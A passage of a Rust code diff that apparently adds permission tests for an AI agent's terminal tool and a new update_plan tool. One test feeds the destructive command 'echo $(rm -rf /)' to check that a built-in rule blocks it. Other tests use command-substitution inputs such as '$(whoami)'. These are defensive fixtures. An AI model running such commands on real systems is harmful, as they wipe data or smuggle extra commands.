+ ) {
+ crate::tests::init_test(cx);
+
+ let fs = fs::FakeFs::new(cx.executor());
+ fs.insert_tree("/root", serde_json::json!({})).await;
+ let project = project::Project::test(fs, ["/root".as_ref()], cx).await;
+
+ let environment = std::rc::Rc::new(cx.update(|cx| {
+ crate::tests::FakeThreadEnvironment::default()
+ .with_terminal(crate::tests::FakeTerminalHandle::new_never_exits(cx))
+ }));
+
+ cx.update(|cx| {
+ let mut settings = agent_settings::AgentSettings::get_global(cx).clone();
+ settings.tool_permissions.default = settings::ToolPermissionMode::Confirm;
+ settings.tool_permissions.tools.remove(TerminalTool::NAME);
+ agent_settings::AgentSettings::override_global(settings, cx);
+ });
+
+ #[allow(clippy::arc_with_non_send_sync)]
+ let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone()));
+ let (event_stream, mut rx) = crate::ToolCallEventStream::test();
+
+ let task = cx.update(|cx| {
+ tool.run(
+ crate::ToolInput::resolved(TerminalToolInput {
+ command: "echo $HOME".to_string(),
+ cd: "root".to_string(),
+ timeout_ms: None,
+ }),
+ event_stream,
+ cx,
+ )
+ });
+
+ let result = task.await;
+ let error = result.expect_err("expected invalid terminal command to be rejected");
+ assert!(
+ error.contains("does not allow shell substitutions or interpolations"),
+ "expected explicit invalid-command message, got: {error}"
+ );
+ assert!(
+ environment.terminal_creation_count() == 0,
+ "terminal should not be created for invalid commands"
+ );
+ assert!(
+ !matches!(
+ rx.try_next(),
+ Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_))))
+ ),
+ "invalid command should not request authorization"
+ );
+ assert!(
+ !matches!(
+ rx.try_next(),
+ Ok(Some(Ok(crate::ThreadEvent::ToolCallUpdate(
+ acp_thread::ToolCallUpdate::UpdateFields(_)
+ ))))
+ ),
+ "invalid command should not emit a terminal card update"
+ );
+ }
+
+ #[gpui::test]
+ async fn test_run_allows_invalid_substitution_in_unconditional_allow_all_mode(
+ cx: &mut gpui::TestAppContext,
+ ) {
+ crate::tests::init_test(cx);
+
+ let fs = fs::FakeFs::new(cx.executor());
+ fs.insert_tree("/root", serde_json::json!({})).await;
+ let project = project::Project::test(fs, ["/root".as_ref()], cx).await;
+
+ let environment = std::rc::Rc::new(cx.update(|cx| {
+ crate::tests::FakeThreadEnvironment::default().with_terminal(
+ crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0),
+ )
+ }));
+
+ cx.update(|cx| {
+ let mut settings = agent_settings::AgentSettings::get_global(cx).clone();
+ settings.tool_permissions.default = settings::ToolPermissionMode::Allow;
+ settings.tool_permissions.tools.remove(TerminalTool::NAME);
+ agent_settings::AgentSettings::override_global(settings, cx);
+ });
+
+ #[allow(clippy::arc_with_non_send_sync)]
+ let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone()));
+ let (event_stream, mut rx) = crate::ToolCallEventStream::test();
+
+ let task = cx.update(|cx| {
+ tool.run(
+ crate::ToolInput::resolved(TerminalToolInput {
+ command: "echo $HOME".to_string(),
+ cd: "root".to_string(),
+ timeout_ms: None,
+ }),
+ event_stream,
+ cx,
+ )
+ });
+
+ let update = rx.expect_update_fields().await;
+ assert!(
+ update.content.iter().any(|blocks| {
+ blocks
+ .iter()
+ .any(|content| matches!(content, acp::ToolCallContent::Terminal(_)))
+ }),
+ "expected terminal content update in unconditional allow-all mode"
+ );
+
+ let result = task
+ .await
+ .expect("command should proceed in unconditional allow-all mode");
+ assert!(
+ environment.terminal_creation_count() == 1,
+ "terminal should be created exactly once"
+ );
+ assert!(
+ !result.contains("could not be approved"),
+ "unexpected invalid-command rejection output: {result}"
+ );
+ }
+
+ #[gpui::test]
+ async fn test_run_hardcoded_denial_still_wins_in_unconditional_allow_all_mode(
+ cx: &mut gpui::TestAppContext,
+ ) {
+ crate::tests::init_test(cx);
+
+ let fs = fs::FakeFs::new(cx.executor());
+ fs.insert_tree("/root", serde_json::json!({})).await;
+ let project = project::Project::test(fs, ["/root".as_ref()], cx).await;
+
+ let environment = std::rc::Rc::new(cx.update(|cx| {
+ crate::tests::FakeThreadEnvironment::default()
+ .with_terminal(crate::tests::FakeTerminalHandle::new_never_exits(cx))
+ }));
+
+ cx.update(|cx| {
+ let mut settings = agent_settings::AgentSettings::get_global(cx).clone();
+ settings.tool_permissions.default = settings::ToolPermissionMode::Allow;
+ settings.tool_permissions.tools.remove(TerminalTool::NAME);
+ agent_settings::AgentSettings::override_global(settings, cx);
+ });
+
+ #[allow(clippy::arc_with_non_send_sync)]
+ let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone()));
+ let (event_stream, mut rx) = crate::ToolCallEventStream::test();
+
+ let task = cx.update(|cx| {
+ tool.run(
+ crate::ToolInput::resolved(TerminalToolInput {
+ command: "echo $(rm -rf /)".to_string(),
+ cd: "root".to_string(),
+ timeout_ms: None,
+ }),
+ event_stream,
+ cx,
+ )
+ });
+
+ let error = task
+ .await
+ .expect_err("hardcoded denial should override unconditional allow-all");
+ assert!(
+ error.contains("built-in security rule"),
+ "expected hardcoded denial message, got: {error}"
+ );
+ assert!(
+ environment.terminal_creation_count() == 0,
+ "hardcoded denial should prevent terminal creation"
+ );
+ assert!(
+ !matches!(
+ rx.try_next(),
+ Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_))))
+ ),
+ "hardcoded denial should not request authorization"
+ );
+ }
+
+ #[gpui::test]
+ async fn test_run_env_prefixed_allow_pattern_is_used_end_to_end(cx: &mut gpui::TestAppContext) {
+ crate::tests::init_test(cx);
+
+ let fs = fs::FakeFs::new(cx.executor());
+ fs.insert_tree("/root", serde_json::json!({})).await;
+ let project = project::Project::test(fs, ["/root".as_ref()], cx).await;
+
+ let environment = std::rc::Rc::new(cx.update(|cx| {
+ crate::tests::FakeThreadEnvironment::default().with_terminal(
+ crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0),
+ )
+ }));
+
+ cx.update(|cx| {
+ let mut settings = agent_settings::AgentSettings::get_global(cx).clone();
+ settings.tool_permissions.default = settings::ToolPermissionMode::Deny;
+ settings.tool_permissions.tools.insert(
+ TerminalTool::NAME.into(),
+ agent_settings::ToolRules {
+ default: Some(settings::ToolPermissionMode::Deny),
+ always_allow: vec![
+ agent_settings::CompiledRegex::new(r"^PAGER=blah\s+git\s+log(\s|$)", false)
+ .unwrap(),
+ ],
+ always_deny: vec![],
+ always_confirm: vec![],
+ invalid_patterns: vec![],
+ },
+ );
+ agent_settings::AgentSettings::override_global(settings, cx);
+ });
+
+ #[allow(clippy::arc_with_non_send_sync)]
+ let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone()));
+ let (event_stream, mut rx) = crate::ToolCallEventStream::test();
+
+ let task = cx.update(|cx| {
+ tool.run(
+ crate::ToolInput::resolved(TerminalToolInput {
+ command: "PAGER=blah git log --oneline".to_string(),
+ cd: "root".to_string(),
+ timeout_ms: None,
+ }),
+ event_stream,
+ cx,
+ )
+ });
+
+ let update = rx.expect_update_fields().await;
+ assert!(
+ update.content.iter().any(|blocks| {
+ blocks
+ .iter()
+ .any(|content| matches!(content, acp::ToolCallContent::Terminal(_)))
+ }),
+ "expected terminal content update for matching env-prefixed allow rule"
+ );
+
+ let result = task
+ .await
+ .expect("expected env-prefixed command to be allowed");
+ assert!(
+ environment.terminal_creation_count() == 1,
+ "terminal should be created for allowed env-prefixed command"
+ );
+ assert!(
+ result.contains("command output") || result.contains("Command executed successfully."),
+ "unexpected terminal result: {result}"
+ );
+ }
+
+ #[gpui::test]
+ async fn test_run_old_anchored_git_pattern_no_longer_auto_allows_env_prefix(
+ cx: &mut gpui::TestAppContext,
+ ) {
+ crate::tests::init_test(cx);
+
+ let fs = fs::FakeFs::new(cx.executor());
+ fs.insert_tree("/root", serde_json::json!({})).await;
+ let project = project::Project::test(fs, ["/root".as_ref()], cx).await;
+
+ let environment = std::rc::Rc::new(cx.update(|cx| {
+ crate::tests::FakeThreadEnvironment::default().with_terminal(
+ crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0),
+ )
+ }));
+
+ cx.update(|cx| {
+ let mut settings = agent_settings::AgentSettings::get_global(cx).clone();
+ settings.tool_permissions.default = settings::ToolPermissionMode::Deny;
+ settings.tool_permissions.tools.insert(
+ TerminalTool::NAME.into(),
+ agent_settings::ToolRules {
+ default: Some(settings::ToolPermissionMode::Confirm),
+ always_allow: vec![
+ agent_settings::CompiledRegex::new(r"^git\b", false).unwrap(),
+ ],
+ always_deny: vec![],
+ always_confirm: vec![],
+ invalid_patterns: vec![],
+ },
+ );
+ agent_settings::AgentSettings::override_global(settings, cx);
+ });
+
+ #[allow(clippy::arc_with_non_send_sync)]
+ let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone()));
+ let (event_stream, mut rx) = crate::ToolCallEventStream::test();
+
+ let _task = cx.update(|cx| {
+ tool.run(
+ crate::ToolInput::resolved(TerminalToolInput {
+ command: "PAGER=blah git log".to_string(),
+ cd: "root".to_string(),
+ timeout_ms: None,
+ }),
+ event_stream,
+ cx,
+ )
+ });
+
+ let _auth = rx.expect_authorization().await;
+ assert!(
+ environment.terminal_creation_count() == 0,
+ "confirm flow should not create terminal before authorization"
+ );
+ }
+
+ #[test]
+ fn test_terminal_tool_description_mentions_forbidden_substitutions() {
+ let description = <TerminalTool as crate::AgentTool>::description().to_string();
+
+ assert!(
+ description.contains("$VAR"),
+ "missing $VAR example: {description}"
+ );
+ assert!(
+ description.contains("${VAR}"),
+ "missing ${{VAR}} example: {description}"
+ );
+ assert!(
+ description.contains("$(...)"),
+ "missing $(...) example: {description}"
+ );
+ assert!(
+ description.contains("backticks"),
+ "missing backticks example: {description}"
+ );
+ assert!(
+ description.contains("$((...))"),
+ "missing $((...)) example: {description}"
+ );
+ assert!(
+ description.contains("<(...)") && description.contains(">(...)"),
+ "missing process substitution examples: {description}"
+ );
+ }
+
+ #[test]
+ fn test_terminal_tool_input_schema_mentions_forbidden_substitutions() {
+ let schema = <TerminalTool as crate::AgentTool>::input_schema(
+ language_model::LanguageModelToolSchemaFormat::JsonSchema,
+ );
+ let schema_json = serde_json::to_value(schema).expect("schema should serialize");
+ let schema_text = schema_json.to_string();
+
+ assert!(
+ schema_text.contains("$VAR"),
+ "missing $VAR example: {schema_text}"
+ );
+ assert!(
+ schema_text.contains("${VAR}"),
+ "missing ${{VAR}} example: {schema_text}"
+ );
+ assert!(
+ schema_text.contains("$(...)"),
+ "missing $(...) example: {schema_text}"
+ );
+ assert!(
+ schema_text.contains("backticks"),
+ "missing backticks example: {schema_text}"
+ );
+ assert!(
+ schema_text.contains("$((...))"),
+ "missing $((...)) example: {schema_text}"
+ );
+ assert!(
+ schema_text.contains("<(...)") && schema_text.contains(">(...)"),
+ "missing process substitution examples: {schema_text}"
+ );
+ }
+
+ async fn assert_rejected_before_terminal_creation(
+ command: &str,
+ cx: &mut gpui::TestAppContext,
+ ) {
+ let fs = fs::FakeFs::new(cx.executor());
+ fs.insert_tree("/root", serde_json::json!({})).await;
+ let project = project::Project::test(fs, ["/root".as_ref()], cx).await;
+
+ let environment = std::rc::Rc::new(cx.update(|cx| {
+ crate::tests::FakeThreadEnvironment::default()
+ .with_terminal(crate::tests::FakeTerminalHandle::new_never_exits(cx))
+ }));
+
+ cx.update(|cx| {
+ let mut settings = agent_settings::AgentSettings::get_global(cx).clone();
+ settings.tool_permissions.default = settings::ToolPermissionMode::Confirm;
+ settings.tool_permissions.tools.remove(TerminalTool::NAME);
+ agent_settings::AgentSettings::override_global(settings, cx);
+ });
+
+ #[allow(clippy::arc_with_non_send_sync)]
+ let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone()));
+ let (event_stream, mut rx) = crate::ToolCallEventStream::test();
+
+ let task = cx.update(|cx| {
+ tool.run(
+ crate::ToolInput::resolved(TerminalToolInput {
+ command: command.to_string(),
+ cd: "root".to_string(),
+ timeout_ms: None,
+ }),
+ event_stream,
+ cx,
+ )
+ });
+
+ let result = task.await;
+ let error = result.unwrap_err();
+ assert!(
+ error.contains("does not allow shell substitutions or interpolations"),
+ "command {command:?} should be rejected with substitution message, got: {error}"
+ );
+ assert!(
+ environment.terminal_creation_count() == 0,
+ "no terminal should be created for rejected command {command:?}"
+ );
+ assert!(
+ !matches!(
+ rx.try_next(),
+ Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_))))
+ ),
+ "rejected command {command:?} should not request authorization"
+ );
+ }
+
+ #[gpui::test]
+ async fn test_rejects_variable_expansion(cx: &mut gpui::TestAppContext) {
+ crate::tests::init_test(cx);
+ assert_rejected_before_terminal_creation("echo ${HOME}", cx).await;
+ }
+
+ #[gpui::test]
+ async fn test_rejects_positional_parameter(cx: &mut gpui::TestAppContext) {
+ crate::tests::init_test(cx);
+ assert_rejected_before_terminal_creation("echo $1", cx).await;
+ }
+
+ #[gpui::test]
+ async fn test_rejects_special_parameter_question(cx: &mut gpui::TestAppContext) {
+ crate::tests::init_test(cx);
+ assert_rejected_before_terminal_creation("echo $?", cx).await;
+ }
+
+ #[gpui::test]
+ async fn test_rejects_special_parameter_dollar(cx: &mut gpui::TestAppContext) {
+ crate::tests::init_test(cx);
+ assert_rejected_before_terminal_creation("echo $$", cx).await;
+ }
+
+ #[gpui::test]
+ async fn test_rejects_special_parameter_at(cx: &mut gpui::TestAppContext) {
+ crate::tests::init_test(cx);
+ assert_rejected_before_terminal_creation("echo $@", cx).await;
+ }
+
+ #[gpui::test]
+ async fn test_rejects_command_substitution_dollar_parens(cx: &mut gpui::TestAppContext) {
+ crate::tests::init_test(cx);
+ assert_rejected_before_terminal_creation("echo $(whoami)", cx).await;
+ }
+
+ #[gpui::test]
+ async fn test_rejects_command_substitution_backticks(cx: &mut gpui::TestAppContext) {
+ crate::tests::init_test(cx);
+ assert_rejected_before_terminal_creation("echo `whoami`", cx).await;
+ }
+
+ #[gpui::test]
+ async fn test_rejects_arithmetic_expansion(cx: &mut gpui::TestAppContext) {
+ crate::tests::init_test(cx);
+ assert_rejected_before_terminal_creation("echo $((1 + 1))", cx).await;
+ }
+
+ #[gpui::test]
+ async fn test_rejects_process_substitution_input(cx: &mut gpui::TestAppContext) {
+ crate::tests::init_test(cx);
+ assert_rejected_before_terminal_creation("cat <(ls)", cx).await;
+ }
+
+ #[gpui::test]
+ async fn test_rejects_process_substitution_output(cx: &mut gpui::TestAppContext) {
+ crate::tests::init_test(cx);
+ assert_rejected_before_terminal_creation("ls >(cat)", cx).await;
+ }
+
+ #[gpui::test]
+ async fn test_rejects_env_prefix_with_variable(cx: &mut gpui::TestAppContext) {
+ crate::tests::init_test(cx);
+ assert_rejected_before_terminal_creation("PAGER=$HOME git log", cx).await;
+ }
+
+ #[gpui::test]
+ async fn test_rejects_env_prefix_with_command_substitution(cx: &mut gpui::TestAppContext) {
+ crate::tests::init_test(cx);
+ assert_rejected_before_terminal_creation("PAGER=$(whoami) git log", cx).await;
+ }
+
+ #[gpui::test]
+ async fn test_rejects_env_prefix_with_brace_expansion(cx: &mut gpui::TestAppContext) {
+ crate::tests::init_test(cx);
+ assert_rejected_before_terminal_creation(
+ "GIT_SEQUENCE_EDITOR=${EDITOR} git rebase -i HEAD~2",
+ cx,
+ )
+ .await;
+ }
+
+ #[gpui::test]
+ async fn test_rejects_multiline_with_forbidden_on_second_line(cx: &mut gpui::TestAppContext) {
+ crate::tests::init_test(cx);
+ assert_rejected_before_terminal_creation("echo ok\necho $HOME", cx).await;
+ }
+
+ #[gpui::test]
+ async fn test_rejects_multiline_with_forbidden_mixed(cx: &mut gpui::TestAppContext) {
+ crate::tests::init_test(cx);
+ assert_rejected_before_terminal_creation("PAGER=less git log\necho $(whoami)", cx).await;
+ }
+
+ #[gpui::test]
+ async fn test_rejects_nested_command_substitution(cx: &mut gpui::TestAppContext) {
+ crate::tests::init_test(cx);
+ assert_rejected_before_terminal_creation("echo $(cat $(whoami).txt)", cx).await;
+ }
+
+ #[gpui::test]
+ async fn test_allow_all_terminal_specific_default_with_empty_patterns(
+ cx: &mut gpui::TestAppContext,
+ ) {
+ crate::tests::init_test(cx);
+
+ let fs = fs::FakeFs::new(cx.executor());
+ fs.insert_tree("/root", serde_json::json!({})).await;
+ let project = project::Project::test(fs, ["/root".as_ref()], cx).await;
+
+ let environment = std::rc::Rc::new(cx.update(|cx| {
+ crate::tests::FakeThreadEnvironment::default().with_terminal(
+ crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0),
+ )
+ }));
+
+ cx.update(|cx| {
+ let mut settings = agent_settings::AgentSettings::get_global(cx).clone();
+ settings.tool_permissions.default = settings::ToolPermissionMode::Deny;
+ settings.tool_permissions.tools.insert(
+ TerminalTool::NAME.into(),
+ agent_settings::ToolRules {
+ default: Some(settings::ToolPermissionMode::Allow),
+ always_allow: vec![],
+ always_deny: vec![],
+ always_confirm: vec![],
+ invalid_patterns: vec![],
+ },
+ );
+ agent_settings::AgentSettings::override_global(settings, cx);
+ });
+
+ #[allow(clippy::arc_with_non_send_sync)]
+ let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone()));
+ let (event_stream, mut rx) = crate::ToolCallEventStream::test();
+
+ let task = cx.update(|cx| {
+ tool.run(
+ crate::ToolInput::resolved(TerminalToolInput {
+ command: "echo $(whoami)".to_string(),
+ cd: "root".to_string(),
+ timeout_ms: None,
+ }),
+ event_stream,
+ cx,
+ )
+ });
+
+ let update = rx.expect_update_fields().await;
+ assert!(
+ update.content.iter().any(|blocks| {
+ blocks
+ .iter()
+ .any(|content| matches!(content, acp::ToolCallContent::Terminal(_)))
+ }),
+ "terminal-specific allow-all should bypass substitution rejection"
+ );
+
+ let result = task
+ .await
+ .expect("terminal-specific allow-all should let the command proceed");
+ assert!(
+ environment.terminal_creation_count() == 1,
+ "terminal should be created exactly once"
+ );
+ assert!(
+ !result.contains("could not be approved"),
+ "unexpected rejection output: {result}"
+ );
+ }
+
+ #[gpui::test]
+ async fn test_env_prefix_pattern_rejects_different_value(cx: &mut gpui::TestAppContext) {
+ crate::tests::init_test(cx);
+
+ let fs = fs::FakeFs::new(cx.executor());
+ fs.insert_tree("/root", serde_json::json!({})).await;
+ let project = project::Project::test(fs, ["/root".as_ref()], cx).await;
+
+ let environment = std::rc::Rc::new(cx.update(|cx| {
+ crate::tests::FakeThreadEnvironment::default().with_terminal(
+ crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0),
+ )
+ }));
+
+ cx.update(|cx| {
+ let mut settings = agent_settings::AgentSettings::get_global(cx).clone();
+ settings.tool_permissions.default = settings::ToolPermissionMode::Deny;
+ settings.tool_permissions.tools.insert(
+ TerminalTool::NAME.into(),
+ agent_settings::ToolRules {
+ default: Some(settings::ToolPermissionMode::Deny),
+ always_allow: vec![
+ agent_settings::CompiledRegex::new(r"^PAGER=blah\s+git\s+log(\s|$)", false)
+ .unwrap(),
+ ],
+ always_deny: vec![],
+ always_confirm: vec![],
+ invalid_patterns: vec![],
+ },
+ );
+ agent_settings::AgentSettings::override_global(settings, cx);
+ });
+
+ #[allow(clippy::arc_with_non_send_sync)]
+ let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone()));
+ let (event_stream, _rx) = crate::ToolCallEventStream::test();
+
+ let task = cx.update(|cx| {
+ tool.run(
+ crate::ToolInput::resolved(TerminalToolInput {
+ command: "PAGER=other git log".to_string(),
+ cd: "root".to_string(),
+ timeout_ms: None,
+ }),
+ event_stream,
+ cx,
+ )
+ });
+
+ let error = task
+ .await
+ .expect_err("different env-var value should not match allow pattern");
+ assert!(
+ error.contains("could not be approved")
+ || error.contains("denied")
+ || error.contains("disabled"),
+ "expected denial for mismatched env value, got: {error}"
+ );
+ assert!(
+ environment.terminal_creation_count() == 0,
+ "terminal should not be created for non-matching env value"
+ );
+ }
+
+ #[gpui::test]
+ async fn test_env_prefix_multiple_assignments_preserved_in_order(
+ cx: &mut gpui::TestAppContext,
+ ) {
+ crate::tests::init_test(cx);
+
+ let fs = fs::FakeFs::new(cx.executor());
+ fs.insert_tree("/root", serde_json::json!({})).await;
+ let project = project::Project::test(fs, ["/root".as_ref()], cx).await;
+
+ let environment = std::rc::Rc::new(cx.update(|cx| {
+ crate::tests::FakeThreadEnvironment::default().with_terminal(
+ crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0),
+ )
+ }));
+
+ cx.update(|cx| {
+ let mut settings = agent_settings::AgentSettings::get_global(cx).clone();
+ settings.tool_permissions.default = settings::ToolPermissionMode::Deny;
+ settings.tool_permissions.tools.insert(
+ TerminalTool::NAME.into(),
+ agent_settings::ToolRules {
+ default: Some(settings::ToolPermissionMode::Deny),
+ always_allow: vec![
+ agent_settings::CompiledRegex::new(r"^A=1\s+B=2\s+git\s+log(\s|$)", false)
+ .unwrap(),
+ ],
+ always_deny: vec![],
+ always_confirm: vec![],
+ invalid_patterns: vec![],
+ },
+ );
+ agent_settings::AgentSettings::override_global(settings, cx);
+ });
+
+ #[allow(clippy::arc_with_non_send_sync)]
+ let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone()));
+ let (event_stream, mut rx) = crate::ToolCallEventStream::test();
+
+ let task = cx.update(|cx| {
+ tool.run(
+ crate::ToolInput::resolved(TerminalToolInput {
+ command: "A=1 B=2 git log".to_string(),
+ cd: "root".to_string(),
+ timeout_ms: None,
+ }),
+ event_stream,
+ cx,
+ )
+ });
+
+ let update = rx.expect_update_fields().await;
+ assert!(
+ update.content.iter().any(|blocks| {
+ blocks
+ .iter()
+ .any(|content| matches!(content, acp::ToolCallContent::Terminal(_)))
+ }),
+ "multi-assignment pattern should match and produce terminal content"
+ );
+
+ let result = task
+ .await
+ .expect("multi-assignment command matching pattern should be allowed");
+ assert!(
+ environment.terminal_creation_count() == 1,
+ "terminal should be created for matching multi-assignment command"
+ );
+ assert!(
+ result.contains("command output") || result.contains("Command executed successfully."),
+ "unexpected terminal result: {result}"
+ );
+ }
+
+ #[gpui::test]
+ async fn test_env_prefix_quoted_whitespace_value_matches_only_with_quotes_in_pattern(
+ cx: &mut gpui::TestAppContext,
+ ) {
+ crate::tests::init_test(cx);
+
+ let fs = fs::FakeFs::new(cx.executor());
+ fs.insert_tree("/root", serde_json::json!({})).await;
+ let project = project::Project::test(fs, ["/root".as_ref()], cx).await;
+
+ let environment = std::rc::Rc::new(cx.update(|cx| {
+ crate::tests::FakeThreadEnvironment::default().with_terminal(
+ crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0),
+ )
+ }));
+
+ cx.update(|cx| {
+ let mut settings = agent_settings::AgentSettings::get_global(cx).clone();
+ settings.tool_permissions.default = settings::ToolPermissionMode::Deny;
+ settings.tool_permissions.tools.insert(
+ TerminalTool::NAME.into(),
+ agent_settings::ToolRules {
+ default: Some(settings::ToolPermissionMode::Deny),
+ always_allow: vec![
+ agent_settings::CompiledRegex::new(
+ r#"^PAGER="less\ -R"\s+git\s+log(\s|$)"#,
+ false,
+ )
+ .unwrap(),
+ ],
+ always_deny: vec![],
+ always_confirm: vec![],
+ invalid_patterns: vec![],
+ },
+ );
+ agent_settings::AgentSettings::override_global(settings, cx);
+ });
+
+ #[allow(clippy::arc_with_non_send_sync)]
+ let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone()));
+ let (event_stream, mut rx) = crate::ToolCallEventStream::test();
+
+ let task = cx.update(|cx| {
+ tool.run(
+ crate::ToolInput::resolved(TerminalToolInput {
+ command: "PAGER=\"less -R\" git log".to_string(),
+ cd: "root".to_string(),
+ timeout_ms: None,
+ }),
+ event_stream,
+ cx,
+ )
+ });
+
+ let update = rx.expect_update_fields().await;
+ assert!(
+ update.content.iter().any(|blocks| {
+ blocks
+ .iter()
+ .any(|content| matches!(content, acp::ToolCallContent::Terminal(_)))
+ }),
+ "quoted whitespace value should match pattern with quoted form"
+ );
+
+ let result = task
+ .await
+ .expect("quoted whitespace env value matching pattern should be allowed");
+ assert!(
+ environment.terminal_creation_count() == 1,
+ "terminal should be created for matching quoted-value command"
+ );
+ assert!(
+ result.contains("command output") || result.contains("Command executed successfully."),
+ "unexpected terminal result: {result}"
+ );
+ }
}
@@ -0,0 +1,290 @@
+use crate::{AgentTool, ToolCallEventStream, ToolInput};
+use agent_client_protocol as acp;
+use gpui::{App, SharedString, Task};
+use schemars::JsonSchema;
+use serde::{Deserialize, Serialize};
+use std::sync::Arc;
+
+#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema, PartialEq, Eq)]
+#[serde(rename_all = "snake_case")]
+#[schemars(inline)]
+pub enum PlanEntryStatus {
+ /// The task has not started yet.
+ Pending,
+ /// The task is currently being worked on.
+ InProgress,
+ /// The task has been successfully completed.
+ Completed,
+}
+
+impl From<PlanEntryStatus> for acp::PlanEntryStatus {
+ fn from(value: PlanEntryStatus) -> Self {
+ match value {
+ PlanEntryStatus::Pending => acp::PlanEntryStatus::Pending,
+ PlanEntryStatus::InProgress => acp::PlanEntryStatus::InProgress,
+ PlanEntryStatus::Completed => acp::PlanEntryStatus::Completed,
+ }
+ }
+}
+
+#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema, PartialEq, Eq, Default)]
+#[serde(rename_all = "snake_case")]
+#[schemars(inline)]
+pub enum PlanEntryPriority {
+ High,
+ #[default]
+ Medium,
+ Low,
+}
+
+impl From<PlanEntryPriority> for acp::PlanEntryPriority {
+ fn from(value: PlanEntryPriority) -> Self {
+ match value {
+ PlanEntryPriority::High => acp::PlanEntryPriority::High,
+ PlanEntryPriority::Medium => acp::PlanEntryPriority::Medium,
+ PlanEntryPriority::Low => acp::PlanEntryPriority::Low,
+ }
+ }
+}
+
+#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema, PartialEq, Eq)]
+pub struct PlanItem {
+ /// Human-readable description of what this task aims to accomplish.
+ pub step: String,
+ /// The current status of this task.
+ pub status: PlanEntryStatus,
+ /// The relative importance of this task. Defaults to medium when omitted.
+ #[serde(default)]
+ pub priority: PlanEntryPriority,
+}
+
+impl From<PlanItem> for acp::PlanEntry {
+ fn from(value: PlanItem) -> Self {
+ acp::PlanEntry::new(value.step, value.priority.into(), value.status.into())
+ }
+}
+
+/// Updates the task plan.
+/// Provide a list of plan entries, each with step, status, and optional priority.
+#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema, PartialEq, Eq)]
+pub struct UpdatePlanToolInput {
+ /// The list of plan entries and their current statuses.
+ pub plan: Vec<PlanItem>,
+}
+
+pub struct UpdatePlanTool;
+
+impl UpdatePlanTool {
+ fn to_plan(input: UpdatePlanToolInput) -> acp::Plan {
+ acp::Plan::new(input.plan.into_iter().map(Into::into).collect())
+ }
+}
+
+impl AgentTool for UpdatePlanTool {
+ type Input = UpdatePlanToolInput;
+ type Output = String;
+
+ const NAME: &'static str = "update_plan";
+
+ fn kind() -> acp::ToolKind {
+ acp::ToolKind::Think
+ }
+
+ fn initial_title(
+ &self,
+ input: Result<Self::Input, serde_json::Value>,
+ _cx: &mut App,
+ ) -> SharedString {
+ match input {
+ Ok(input) if input.plan.is_empty() => "Clear plan".into(),
+ Ok(_) | Err(_) => "Update plan".into(),
+ }
+ }
+
+ fn run(
+ self: Arc<Self>,
+ input: ToolInput<Self::Input>,
+ event_stream: ToolCallEventStream,
+ cx: &mut App,
+ ) -> Task<Result<Self::Output, Self::Output>> {
+ cx.spawn(async move |_cx| {
+ let input = input
+ .recv()
+ .await
+ .map_err(|e| format!("Failed to receive tool input: {e}"))?;
+
+ event_stream.update_plan(Self::to_plan(input));
+
+ Ok("Plan updated".to_string())
+ })
+ }
+
+ fn replay(
+ &self,
+ input: Self::Input,
+ _output: Self::Output,
+ event_stream: ToolCallEventStream,
+ _cx: &mut App,
+ ) -> anyhow::Result<()> {
+ event_stream.update_plan(Self::to_plan(input));
+ Ok(())
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::ToolCallEventStream;
+ use gpui::TestAppContext;
+ use pretty_assertions::assert_eq;
+
+ fn sample_input() -> UpdatePlanToolInput {
+ UpdatePlanToolInput {
+ plan: vec![
+ PlanItem {
+ step: "Inspect the existing tool wiring".to_string(),
+ status: PlanEntryStatus::Completed,
+ priority: PlanEntryPriority::High,
+ },
+ PlanItem {
+ step: "Implement the update_plan tool".to_string(),
+ status: PlanEntryStatus::InProgress,
+ priority: PlanEntryPriority::Medium,
+ },
+ PlanItem {
+ step: "Add tests".to_string(),
+ status: PlanEntryStatus::Pending,
+ priority: PlanEntryPriority::Low,
+ },
+ ],
+ }
+ }
+
+ #[gpui::test]
+ async fn test_run_emits_plan_event(cx: &mut TestAppContext) {
+ let tool = Arc::new(UpdatePlanTool);
+ let (event_stream, mut event_rx) = ToolCallEventStream::test();
+
+ let input = sample_input();
+ let result = cx
+ .update(|cx| tool.run(ToolInput::resolved(input.clone()), event_stream, cx))
+ .await
+ .expect("tool should succeed");
+
+ assert_eq!(result, "Plan updated".to_string());
+
+ let plan = event_rx.expect_plan().await;
+ assert_eq!(
+ plan,
+ acp::Plan::new(vec![
+ acp::PlanEntry::new(
+ "Inspect the existing tool wiring",
+ acp::PlanEntryPriority::High,
+ acp::PlanEntryStatus::Completed,
+ ),
+ acp::PlanEntry::new(
+ "Implement the update_plan tool",
+ acp::PlanEntryPriority::Medium,
+ acp::PlanEntryStatus::InProgress,
+ ),
+ acp::PlanEntry::new(
+ "Add tests",
+ acp::PlanEntryPriority::Low,
+ acp::PlanEntryStatus::Pending,
+ ),
+ ])
+ );
+ }
+
+ #[gpui::test]
+ async fn test_replay_emits_plan_event(cx: &mut TestAppContext) {
+ let tool = UpdatePlanTool;
+ let (event_stream, mut event_rx) = ToolCallEventStream::test();
+
+ let input = sample_input();
+
+ cx.update(|cx| {
+ tool.replay(input.clone(), "Plan updated".to_string(), event_stream, cx)
